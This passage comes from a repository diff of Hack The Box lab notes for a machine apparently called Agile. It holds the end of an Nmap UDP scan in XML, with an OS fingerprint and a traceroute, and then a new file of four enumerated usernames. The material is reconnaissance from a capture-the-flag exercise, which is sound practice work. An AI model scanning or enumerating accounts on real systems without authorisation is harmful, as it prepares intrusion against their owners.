<port protocol="udp" portid="111"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="rpcbind" method="table" conf="3"/></port>
<port protocol="udp" portid="177"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="xdmcp" method="table" conf="3"/></port>
<port protocol="udp" portid="514"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="syslog" method="table" conf="3"/></port>
<port protocol="udp" portid="1026"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="win-rpc" method="table" conf="3"/></port>
<port protocol="udp" portid="1718"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="h225gatedisc" method="table" conf="3"/></port>
<port protocol="udp" portid="1812"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="radius" method="table" conf="3"/></port>
<port protocol="udp" portid="2223"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="rockwell-csp2" method="table" conf="3"/></port>
<port protocol="udp" portid="5000"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="upnp" method="table" conf="3"/></port>
<port protocol="udp" portid="5632"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="pcanywherestat" method="table" conf="3"/></port>
</ports>
<os><portused state="closed" proto="udp" portid="7"/>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=3/5%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=64048480%P=x86_64-pc-linux-gnu)&#xa;SEQ(CI=Z%II=I)&#xa;T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)&#xa;IE(R=Y%DFI=N%T=40%CD=S)&#xa;"/>
</os>
<distance value="2"/>
<trace port="33281" proto="udp">
<hop ttl="1" ipaddr="10.10.16.1" rtt="86.38"/>
<hop ttl="2" ipaddr="10.129.29.4" rtt="86.81" host="agile.htb"/>
</trace>
<times srtt="107351" rttvar="17327" to="176659"/>
</host>
<taskbegin task="NSE" time="1678017664"/>
<taskend task="NSE" time="1678017664"/>
<taskbegin task="NSE" time="1678017664"/>
<taskend task="NSE" time="1678017664"/>
<taskbegin task="NSE" time="1678017664"/>
<taskend task="NSE" time="1678017664"/>
<runstats><finished time="1678017664" timestr="Sun Mar 5 13:01:04 2023" summary="Nmap done at Sun Mar 5 13:01:04 2023; 1 IP address (1 host up) scanned in 225.98 seconds" elapsed="225.98" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

4
HTB/agile/users Normal file
View File

@@ -0,0 +1,4 @@
edwards
dev_admin
runner
corum